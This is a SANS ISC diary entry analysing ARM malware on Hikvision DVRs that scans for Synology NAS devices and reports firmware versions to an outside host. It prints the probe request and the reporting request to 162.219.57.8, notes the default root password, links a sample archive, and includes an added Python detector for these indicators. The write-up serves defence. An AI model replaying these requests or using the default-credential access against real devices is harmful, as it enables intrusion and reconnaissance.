
SANS ISC InfoSec Handlers Diary Blog



More Device Malware: This is why your DVR attacked my Synology Disk Station (and now with Bitcoin Miner!)

Published: 2014-03-31
Last Updated: 2014-03-31 17:29:48 UTC
by Johannes Ullrich (Version: 1)
6 comment(s)

Update: Just found what looks like a bitcoin miner on the infected DVR. There are two more binaries: D72BNr, the bitcoin miner (according to the usage info found in its strings), and mzkk8g, which looks like a simple HTTP agent, perhaps used to download additional tools easily (similar to curl or wget, which are not installed on this DVR by default). I will add these two files to https://isc.sans.edu/diaryimages/hikvision.zip shortly.

Last week, we reported that some of the hosts scanning for port 5000 are DVRs (to be more precise: Hikvision DVRs, commonly used to record video from surveillance cameras [1]).

Today, we were able to recover the malware responsible. You can download the malware here: https://isc.sans.edu/diaryimages/hikvision.zip (password: infected).

The malware resides in /dev/cmd.so. A number of additional suspect files were located in the /dev directory, which we still need to recover from the test system and analyze. The compromise of the DVR likely happened via an exposed telnet port and a default root password (12345).

Analysis of the malware is still ongoing, and any help is appreciated (see link to malware above). Here are some initial findings:

- The malware is an ARM binary, indicating that it is targeting embedded devices, not your typical x86 Linux server.
- The malware scans for Synology devices exposed on port 5000. The HTTP request sent by the malware:

GET /webman/info.cgi?host= HTTP/1.0
Host: [IP Address of the Target]:5000
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
 
- It then extracts the firmware version details from the response and transmits them to 162.219.57.8. The request used for this reporting channel:
 
GET /k.php?h=%lu HTTP/1.0
Host: 162.219.57.8
User-Agent: Ballsack
Connection: close
 
So in short, this malware is only scanning for vulnerable devices and reporting what it finds; the actual exploit will likely come later.
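Both requests above are distinctive enough to serve as network indicators. The following is an added example (not code from the diary or from the malware analysis) that parses captured HTTP request heads and classifies them against those two patterns: the Synology probe on port 5000 (path plus the MSIE 6.0 user agent) and the reporting request to 162.219.57.8 (destination host, or the "Ballsack" user agent with the /k.php?h= path). It assumes the `%lu` in the diary's reporting request is a printf-style placeholder that the binary fills with a number, so the sample report request below is constructed with a numeric value; the target IP 192.0.2.10 and the benign request are likewise constructed.

```python
"""Classify captured HTTP request heads against the Hikvision DVR scanner indicators."""
import re
from typing import Dict, List, Optional, Tuple

# Indicators taken from the diary text above.
PROBE_PATH = "/webman/info.cgi"
PROBE_UA = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
REPORT_HOST = "162.219.57.8"
REPORT_UA = "Ballsack"
# Assumption: %lu in the diary is a format placeholder, so live traffic carries digits.
REPORT_PATH_RE = re.compile(r"^/k\.php\?h=\d+$")


def parse_request(raw: str) -> Dict[str, object]:
    """Parse the head of an HTTP/1.x request (request line + headers).

    Header names are lowercased. Raises ValueError on a malformed request line.
    """
    lines = raw.strip().splitlines()
    if not lines:
        raise ValueError("empty request")
    parts = lines[0].split()
    if len(parts) != 3:
        raise ValueError(f"malformed request line: {lines[0]!r}")
    method, target, version = parts
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if not line.strip():
            break  # blank line ends the header block
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "version": version, "headers": headers}


def classify(req: Dict[str, object]) -> Optional[str]:
    """Return an indicator name if the request matches the scanner's traffic, else None."""
    target = str(req["target"])
    path = target.split("?", 1)[0]
    headers = req["headers"]  # type: ignore[assignment]
    ua = headers.get("user-agent", "")
    host = headers.get("host", "").split(":")[0]  # drop the :5000 port suffix
    # Stage 1: the DVR probing a Synology DiskStation for its firmware version.
    # Both the path and the exact user agent are required, so ordinary DSM
    # clients hitting info.cgi with a current browser are not flagged.
    if req["method"] == "GET" and path == PROBE_PATH and ua == PROBE_UA:
        return "synology-version-probe"
    # Stage 2: the infected DVR reporting the result to the collection host.
    if host == REPORT_HOST or (ua == REPORT_UA and REPORT_PATH_RE.match(target)):
        return "version-report-to-162.219.57.8"
    return None


def scan_capture(raw_requests: List[str]) -> List[Tuple[int, str]]:
    """Classify a list of captured request heads; return (index, indicator) for hits."""
    hits = []
    for i, raw in enumerate(raw_requests):
        try:
            label = classify(parse_request(raw))
        except ValueError:
            continue  # skip unparseable captures rather than abort the sweep
        if label:
            hits.append((i, label))
    return hits


# Constructed samples: the two requests from the diary (with a constructed
# target address and a constructed numeric h= value) plus a benign request.
PROBE_SAMPLE = (
    "GET /webman/info.cgi?host= HTTP/1.0\r\n"
    "Host: 192.0.2.10:5000\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 0\r\n\r\n"
)
REPORT_SAMPLE = (
    "GET /k.php?h=4470 HTTP/1.0\r\n"
    "Host: 162.219.57.8\r\n"
    "User-Agent: Ballsack\r\n"
    "Connection: close\r\n\r\n"
)
BENIGN_SAMPLE = (
    "GET /webman/index.cgi HTTP/1.1\r\n"
    "Host: 192.0.2.10:5000\r\n"
    "User-Agent: Mozilla/5.0 (X11; Linux x86_64) Firefox/28.0\r\n\r\n"
)

if __name__ == "__main__":
    for idx, label in scan_capture([PROBE_SAMPLE, BENIGN_SAMPLE, REPORT_SAMPLE]):
        print(f"request {idx}: {label}")
```

Feed it request heads pulled from a proxy log or a packet capture of traffic to your NAS on port 5000 and of outbound traffic from the DVR segment; any hit on the second indicator means a device on your own network is already infected and reporting out, which is the more urgent of the two.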
 
[1] http://www.hikvision.com/en/us/Products_show.asp?id=4258

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute

Keywords: dvr synology